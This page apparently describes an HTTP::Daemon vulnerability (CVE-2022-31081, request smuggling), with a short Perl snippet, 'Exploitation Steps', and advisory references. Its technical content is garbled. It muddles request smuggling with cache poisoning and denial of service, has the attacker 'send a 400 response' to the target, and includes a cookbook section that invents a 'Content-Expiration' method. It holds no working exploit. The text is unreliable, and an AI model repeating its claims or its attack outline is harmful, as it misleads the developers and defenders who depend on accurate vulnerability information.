The most common form of exploitation is to poison the cache of a target site. This can be done by injecting a large number of `HEAD` requests into the client-side code of a target site, which will cause it to send an excessive number of `GET` requests to HTTP daemon servers, resulting in a denial of service. For example, if a target site has the following code, injecting a large number of `HEAD` requests will cause an HTTP daemon server to be flooded with `GET` requests. This will in turn result in the target site being unable to load any of the pages that depend on the `HTTP::Daemon`: # This would result in a target site being unable to load pages that depend on the `HTTP::Daemon` $conn = HTTP::Daemon->new( server => '127.0.0.1', port => 8080, ); $conn->get_request( $rqst ) This could be exploited to poison the cache of a target site, resulting in a denial of service. After calling `my $cl = $rqst->header('Content-Length')` one could inspect the returned `HTTP::Request` object. Querying the 'Content-Length' (`my $cl = $rqst->header('Content-Length')`) will show any abnormalities that should be dealt with by a `400` response. Expected strings of 'Content-Length' SHOULD consist of
400 - Bad Request
==> 400 - Bad Request
HTTP::Daemon cookbook
The HTTP::Daemon cookbook contains a list of methods to ensure proper behavior on your daemon. You should check this list before implementing any new features. This is a good way of adding sanity checks before you deploy changes.
If you're looking to implement features like content expiration, then you should take a look at the `Content-Expiration` method. In order to use this method, you will need to know what type of content your daemon handles in the first place. For example, if your daemon handles HTML documents, then it would be useless to implement this feature as it will not work on any other types of content like PDF documents or image files that are served by the HTTP daemon server.
Exploitation Steps:
First, the attacker must identify a target site that they wish to exploit.
Second, the attacker must start sending a large number of `HEAD` requests to the target site in order to flood it with `GET` requests.
Third, after identifying abnormalities in the returned `HTTP::Request` object, the attacker will send a `400` response to the target site in order to trigger an exploitation attempt.
Fourth, after triggering an exploitation attempt, the attacker can use resources such as XSRF vulnerabilities or cross-site scripting vulnerabilities to gain access and potentially steal information from a target website that is vulnerable and has been exploited by this attack.
Timeline
Published on: 06/27/2022 21:15:00 UTC
Last modified on: 07/08/2022 17:45:00 UTC
References
- https://github.com/libwww-perl/HTTP-Daemon/commit/e84475de51d6fd7b29354a997413472a99db70b2
- https://github.com/libwww-perl/HTTP-Daemon/commit/8dc5269d59e2d5d9eb1647d82c449ccd880f7fd0
- https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn
- https://datatracker.ietf.org/doc/html/rfc7230#section-9.5
- https://github.com/libwww-perl/HTTP-Daemon/security/advisories/GHSA-cg8c-pxmv-w7cf
- http://metacpan.org/release/HTTP-Daemon/
- https://cwe.mitre.org/data/definitions/444.html
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31081